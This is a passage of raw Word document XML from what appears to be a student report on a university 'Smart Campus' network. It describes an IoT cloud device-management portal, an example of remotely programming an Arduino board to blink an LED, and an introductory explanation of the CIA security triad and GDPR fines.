        <w:t xml:space="preserve">from the UWTSD LAN via a VPN, </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE2393">
        <w:t xml:space="preserve">to create simple rules for the </w:t>
      </w:r>
      <w:r w:rsidR="003F42B8">
        <w:t xml:space="preserve">IoT </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE2393">
        <w:t>devices</w:t>
      </w:r>
      <w:r w:rsidR="003F42B8">
        <w:t xml:space="preserve"> installed within the UWTSD building</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE2393">
        <w:t xml:space="preserve"> to execute</w:t>
      </w:r>
      <w:r w:rsidR="003F42B8">
        <w:t xml:space="preserve"> their intended real world application</w:t>
      </w:r>
      <w:r w:rsidR="00CB4C99">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE2393">
        <w:t xml:space="preserve"> so that the maintenance workers at the university</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> can simply manage the devices from </w:t>
      </w:r>
      <w:r w:rsidR="00CB4C99">
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> smart office end device, although a short training course would be required.</w:t>
      </w:r>
      <w:r w:rsidR="00CB4C99">
        <w:t xml:space="preserve"> An illustration of the of the web browser portal IoT device manager being accessed from the UWTSD LAN can be found in </w:t>
      </w:r>
      <w:r w:rsidR="00CB4C99" w:rsidRPr="00CB4C99">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">figure </w:t>
      </w:r>
      <w:r w:rsidR="004972EB">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>44</w:t>
      </w:r>
      <w:r w:rsidR="00CB4C99" w:rsidRPr="00CB4C99">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24BA76C7" w14:textId="206B803E" w:rsidR="00CB4C99" w:rsidRDefault="00CB4C99" w:rsidP="00F72838">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09EABC17" w14:textId="77777777" w:rsidR="00850153" w:rsidRDefault="00850153" w:rsidP="00850153">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="00DE28EF" wp14:editId="41315260">
            <wp:extent cx="3200400" cy="1295400"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="190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200400" cy="1295400"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="57239D18" w14:textId="6A694EA1" w:rsidR="00CB4C99" w:rsidRPr="00CB4C99" w:rsidRDefault="00850153" w:rsidP="00850153">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="004972EB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>44</w:t>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00850153">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Web Browser IoT Device Cloud Management Remote Login Portal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A59AFD" w14:textId="1EEB9030" w:rsidR="00FE2393" w:rsidRDefault="00850153" w:rsidP="00F72838">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Once the user has logged into the web browser within the registration server</w:t>
      </w:r>
      <w:r w:rsidR="003F42B8">
        <w:t xml:space="preserve"> stored at the IoT cloud datacentre LAN</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, a list of the connected devices is presented to the user at the home (index) page shown in </w:t>
      </w:r>
      <w:r w:rsidRPr="00850153">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">figure </w:t>
      </w:r>
      <w:r w:rsidR="004972EB">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>45</w:t>
      </w:r>
      <w:r w:rsidRPr="00850153">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A22A92F" w14:textId="2EC14019" w:rsidR="00850153" w:rsidRDefault="00850153" w:rsidP="00F72838">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="706AA08D" w14:textId="77777777" w:rsidR="00D92B47" w:rsidRDefault="00D92B47" w:rsidP="00D92B47">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4CADB6DD" wp14:editId="3F4D0D35">
            <wp:extent cx="3200400" cy="27051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200400" cy="2705100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2D800F" w14:textId="73A61360" w:rsidR="00021E6E" w:rsidRDefault="00D92B47" w:rsidP="00D92B47">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="004972EB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>45</w:t>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>: IoT Cloud Device Management Portal Index Page</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23298B09" w14:textId="2C1D2539" w:rsidR="00D92B47" w:rsidRDefault="00D92B47" w:rsidP="00D92B47">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>From the index page the user can view the connected and active devices and then click the conditions tab within the top left corner to set rules for the devices to interact with each other bases on various metrics</w:t>
      </w:r>
      <w:r w:rsidR="00D33F4E">
        <w:t>. This</w:t>
      </w:r>
      <w:r w:rsidR="00326FB1">
        <w:t xml:space="preserve"> web</w:t>
      </w:r>
      <w:r w:rsidR="00D33F4E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00326FB1">
        <w:t>portal</w:t>
      </w:r>
      <w:r w:rsidR="00D33F4E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00326FB1">
        <w:t xml:space="preserve">tab </w:t>
      </w:r>
      <w:r w:rsidR="00D33F4E">
        <w:t>was utilised to programme the rules for the previously discussed IoT devices within the UWTSD – ‘Smart’ Campus network</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, shown in figure </w:t>
      </w:r>
      <w:r w:rsidR="004972EB">
        <w:t>46</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="202A4C27" w14:textId="11B83309" w:rsidR="00F30113" w:rsidRDefault="00F30113" w:rsidP="00D92B47">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33D9B4F0" w14:textId="77777777" w:rsidR="004972EB" w:rsidRDefault="0012615B" w:rsidP="004972EB">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2A8CE7E0" wp14:editId="4C4C206F">
            <wp:extent cx="3232785" cy="2830195"/>
            <wp:effectExtent l="0" t="0" r="5715"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232785" cy="2830195"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E7DFA5" w14:textId="60D068BE" w:rsidR="00D92B47" w:rsidRDefault="004972EB" w:rsidP="004972EB">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>46</w:t>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>: IoT Remote Management of Devices Using the Cloud FQDN From UWTSD LAN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1676F577" w14:textId="65B1FB7A" w:rsidR="0012615B" w:rsidRDefault="0012615B" w:rsidP="00D92B47">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>The portal also allows for devices to be remotely programmed</w:t>
      </w:r>
      <w:r w:rsidR="00AE4481">
        <w:t xml:space="preserve"> within the ‘Editor’ link within the top right corner of the web portal</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> utilising python, java or blocky </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>gui</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> code. An example of </w:t>
      </w:r>
      <w:r w:rsidR="00AE4481">
        <w:t>how IoT devices can be programmed remotely</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> was implemented utilising </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>an</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0012615B">
        <w:t xml:space="preserve">Multipoint control unit </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(MTU) Arduino board and an LED, using </w:t>
      </w:r>
      <w:r w:rsidR="00CE3B36">
        <w:t>‘Java’ code</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> in figure </w:t>
      </w:r>
      <w:r w:rsidR="004972EB">
        <w:t>47.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="654F852A" w14:textId="36B483BC" w:rsidR="0012615B" w:rsidRDefault="0012615B" w:rsidP="00D92B47">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41B236E3" w14:textId="42D3E18A" w:rsidR="0012615B" w:rsidRDefault="005F6125" w:rsidP="0012615B">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="558035D6" wp14:editId="636D9899">
            <wp:extent cx="3204845" cy="2208487"/>
            <wp:effectExtent l="19050" t="19050" r="14605" b="209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204845" cy="2208487"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="462E9737" w14:textId="3AA1E4DE" w:rsidR="0012615B" w:rsidRDefault="0012615B" w:rsidP="005F6125">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="004972EB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>47</w:t>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Example PT </w:t>
      </w:r>
      <w:r w:rsidR="00CE3B36">
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> code for MCU to Make LED blink</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A70F4FE" w14:textId="6ADF9194" w:rsidR="0012615B" w:rsidRDefault="0012615B" w:rsidP="00D92B47">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Within PT </w:t>
      </w:r>
      <w:r w:rsidR="00973220">
        <w:t>once the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> code is run it indicates at the bottom of the screen the action the device is executing</w:t>
      </w:r>
      <w:r w:rsidR="00A13D5A">
        <w:t xml:space="preserve"> to confirm the code </w:t>
      </w:r>
      <w:r w:rsidR="00183845">
        <w:t>is successful along with the action of the programme which in this case was the LED blinking from Black to Green.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AAF23F5" w14:textId="77777777" w:rsidR="00A13D5A" w:rsidRDefault="00A13D5A" w:rsidP="00D92B47">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20E8A036" w14:textId="35F61EA2" w:rsidR="0012615B" w:rsidRDefault="00A13D5A" w:rsidP="00D92B47">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Remote IoT device programming is a </w:t>
      </w:r>
      <w:r w:rsidR="0012615B">
        <w:t>very useful tool for industrial IoT devices and the operators that manage them that are located in remote locations that need additional functions</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> in a </w:t>
      </w:r>
      <w:r w:rsidR="00973220">
        <w:t>real-world</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> scenario</w:t>
      </w:r>
      <w:r w:rsidR="0012615B">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FAFB3FB" w14:textId="02987D81" w:rsidR="00A20FEE" w:rsidRDefault="00A20FEE" w:rsidP="00F72838">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F135EC2" w14:textId="371DF93E" w:rsidR="00A20FEE" w:rsidRPr="00654F18" w:rsidRDefault="00A20FEE" w:rsidP="00F72838">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>The security measures implemented within the UWTSD – Smart Campus</w:t>
      </w:r>
      <w:r w:rsidR="00CB4C99">
        <w:t xml:space="preserve"> Architecture </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">to prevent malicious actors accessing the internal network and the IoT devices that control its vital systems will be discussed in detail in the following section. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="147C1445" w14:textId="77777777" w:rsidR="00EA4899" w:rsidRDefault="00EA4899" w:rsidP="00F72838">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A413755" w14:textId="2CAD0966" w:rsidR="00182573" w:rsidRPr="008B2B9E" w:rsidRDefault="008B2B9E" w:rsidP="00144508">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00144508">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Cybersecurity</w:t>
      </w:r>
      <w:r w:rsidR="00144508">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00144508">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Considerations</w:t>
      </w:r>
      <w:r w:rsidR="00144508">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00144508">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidR="00144508">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00144508">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Implementation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18F63552" w14:textId="77777777" w:rsidR="005420B8" w:rsidRPr="005420B8" w:rsidRDefault="005420B8" w:rsidP="00F72838">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="4"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C66CA38" w14:textId="2B4867F4" w:rsidR="005420B8" w:rsidRDefault="005420B8" w:rsidP="00F72838">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>The network architecture was designed and secured using an industry standard framework called Confidentiality Integrity and Availability</w:t>
      </w:r>
      <w:r w:rsidR="00022E47">
        <w:t xml:space="preserve"> (CIA)</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37B8FCE3" w14:textId="25EFA03C" w:rsidR="005420B8" w:rsidRDefault="005420B8" w:rsidP="00F72838">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3527881D" w14:textId="77777777" w:rsidR="00360DB2" w:rsidRDefault="00EC7A7B" w:rsidP="00EC7A7B">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The CIA ‘triad’ </w:t>
      </w:r>
      <w:r w:rsidR="00022E47">
        <w:t>i</w:t>
      </w:r>
      <w:r>
        <w:t>s a</w:t>
      </w:r>
      <w:r w:rsidR="00720DFC">
        <w:t xml:space="preserve"> network</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> security </w:t>
      </w:r>
      <w:r w:rsidR="00720DFC">
        <w:t>architectural</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> framework that is an industry standard network security structure to follow whilst designing and/or managing a network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D3034F9" w14:textId="77777777" w:rsidR="00360DB2" w:rsidRDefault="00360DB2" w:rsidP="00EC7A7B">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BF29365" w14:textId="3E860EE4" w:rsidR="00EC7A7B" w:rsidRDefault="00EC7A7B" w:rsidP="00EC7A7B">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>The three basic principles state;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63AD0CAE" w14:textId="77777777" w:rsidR="00EC7A7B" w:rsidRDefault="00EC7A7B" w:rsidP="00EC7A7B">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="140D5F30" w14:textId="67F1E19B" w:rsidR="00EC7A7B" w:rsidRDefault="00EC7A7B" w:rsidP="00EC7A7B">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00EC7A7B">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Confidentiality:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> This principle states that network domains and data housed within those domains should be confidential and only accessible by the user/business that owns or who has permission to access the data/domain. This can be achieved by utilising user login and passwords within LAN and/or web domain for authentication, along with the encryption of data whilst being stored and whilst in transit. This principle is where most malicious attackers exploit to access and steal data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4568DB90" w14:textId="77777777" w:rsidR="00EC7A7B" w:rsidRDefault="00EC7A7B" w:rsidP="00EC7A7B">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60097194" w14:textId="3347DD74" w:rsidR="00EC7A7B" w:rsidRDefault="00EC7A7B" w:rsidP="00EC7A7B">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00EC7A7B">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Integrity:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> This principle states that user/payload data should not be changed and/or manipulated by any unauthorised person whilst being stored or in transit. This principle can be achieved </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>using a combination of encryption and hashing cryptographic techniques.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67077086" w14:textId="77777777" w:rsidR="00720DFC" w:rsidRDefault="00720DFC" w:rsidP="00EC7A7B">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65571CFF" w14:textId="00CC5A83" w:rsidR="00EC7A7B" w:rsidRDefault="00EC7A7B" w:rsidP="00EC7A7B">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00EC7A7B">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Availability</w:t>
      </w:r>
      <w:r>
        <w:t>; This principle states that data should be available to the user/business who owns the data at all times. This can be achieved by building various tiers of redundancy and load balancing into the network utilising both hardware and software where the data is housed to prevent bottlenecks and hardware failures that could make the network unavailable. This principle can also be attacked by malicious actors by leveraging a Denial of Service (DoS) attack against the network the data is housed within.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB90B43" w14:textId="77777777" w:rsidR="00EC7A7B" w:rsidRDefault="00EC7A7B" w:rsidP="00EC7A7B">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A00417F" w14:textId="09608D88" w:rsidR="00EC7A7B" w:rsidRDefault="00EC7A7B" w:rsidP="00EC7A7B">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>The CIA framework aids a network architect and administrators alike with insuring security is considered within all aspects of the network from the physical layer of the ISO model to the application layer, along with efficiency and availability of the network resources, to maximise and strike a balance between network availability and security at each segment of the network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58224903" w14:textId="77777777" w:rsidR="00EC7A7B" w:rsidRDefault="00EC7A7B" w:rsidP="00EC7A7B">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56DD7D54" w14:textId="1E7542D8" w:rsidR="00EC7A7B" w:rsidRDefault="00EC7A7B" w:rsidP="00EC7A7B">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">With the advent of the European Union (EU) General Data protection Regulations (GDPR) that came into effect in May 2018, data security is even more paramount for businesses to keep their client’s data secure, because a breach of the GDPR can incur a business high economic fines of up to €20 million or 4 percent of a business’s economic annual turnover which would be catastrophic to </w:t>
      </w:r>
      <w:r w:rsidR="005325FC">
        <w:t>a majority of businesses/institutions around the globe</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> that could</w:t>
      </w:r>
      <w:r w:rsidR="005325FC">
        <w:t xml:space="preserve"> potentially</w:t>
      </w:r>
      <w:r w:rsidR="00CA578C">
        <w:t xml:space="preserve"> become</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> bankrupt company and</w:t>
      </w:r>
      <w:r w:rsidR="005325FC">
        <w:t>/or</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> also lose confidence from the clients that their data is stored within.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A1DD157" w14:textId="362CB139" w:rsidR="00EC7A7B" w:rsidRDefault="00EC7A7B" w:rsidP="00EC7A7B">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74E2F383" w14:textId="72330FC3" w:rsidR="00EC7A7B" w:rsidRPr="00E11EE2" w:rsidRDefault="00EC7A7B" w:rsidP="00EC7A7B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Within the UWTSD – Smart Campus LAN all aspects of security that pertain to the network have been researched and analysed to synthesise a secure approach from the foundations of the</w:t>
      </w:r>
      <w:r w:rsidR="001C5259" w:rsidRPr="001C5259">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004F7655" w:rsidRPr="004F7655">
        <w:t>Open Systems Interconnection</w:t>
      </w:r>
      <w:r w:rsidR="004F7655">
        <w:t xml:space="preserve"> (OSI) </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">model upwards, insuring network security is present at each layer by utilising the CIA framework as a guide for each tier of the </w:t>
      </w:r>
      <w:r w:rsidR="001C5259">
        <w:t>UWTSD LAN</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> topology in order to create a highly secure </w:t>
      </w:r>
      <w:r w:rsidR="004F7655">
        <w:t>network</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> that will keep </w:t>
      </w:r>
      <w:r w:rsidR="004F7655">
        <w:t>the university</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> data safe and to also install confidence to the </w:t>
      </w:r>
      <w:r w:rsidR="004F7655">
        <w:t>students and client partners</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> that intrust their data to the </w:t>
      </w:r>
      <w:r w:rsidR="004F7655">
        <w:t>university</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00E11EE2">
        <w:t xml:space="preserve"> High network availability has been implemented within the network architecture, the devices and protocol implemented within the UWTSD smart </w:t>
      </w:r>
      <w:r w:rsidR="00BB592E">
        <w:t>campus LAN</w:t>
      </w:r>
      <w:r w:rsidR="00E11EE2">
        <w:t xml:space="preserve"> as previously discussed within the </w:t>
      </w:r>
      <w:r w:rsidR="00E11EE2" w:rsidRPr="00E11EE2">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">UWTSD ‘Smart Campus’ </w:t>
      </w:r>
      <w:r w:rsidR="00E11EE2" w:rsidRPr="00E11EE2">
        <w:t>Network Architecture section of this paper</w:t>
      </w:r>
      <w:r w:rsidR="00BB592E">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4246B315" w14:textId="4F257CCA" w:rsidR="005420B8" w:rsidRDefault="005420B8" w:rsidP="00F72838">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B7331E8" w14:textId="77777777" w:rsidR="00D57C94" w:rsidRDefault="00D57C94" w:rsidP="00D57C94">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
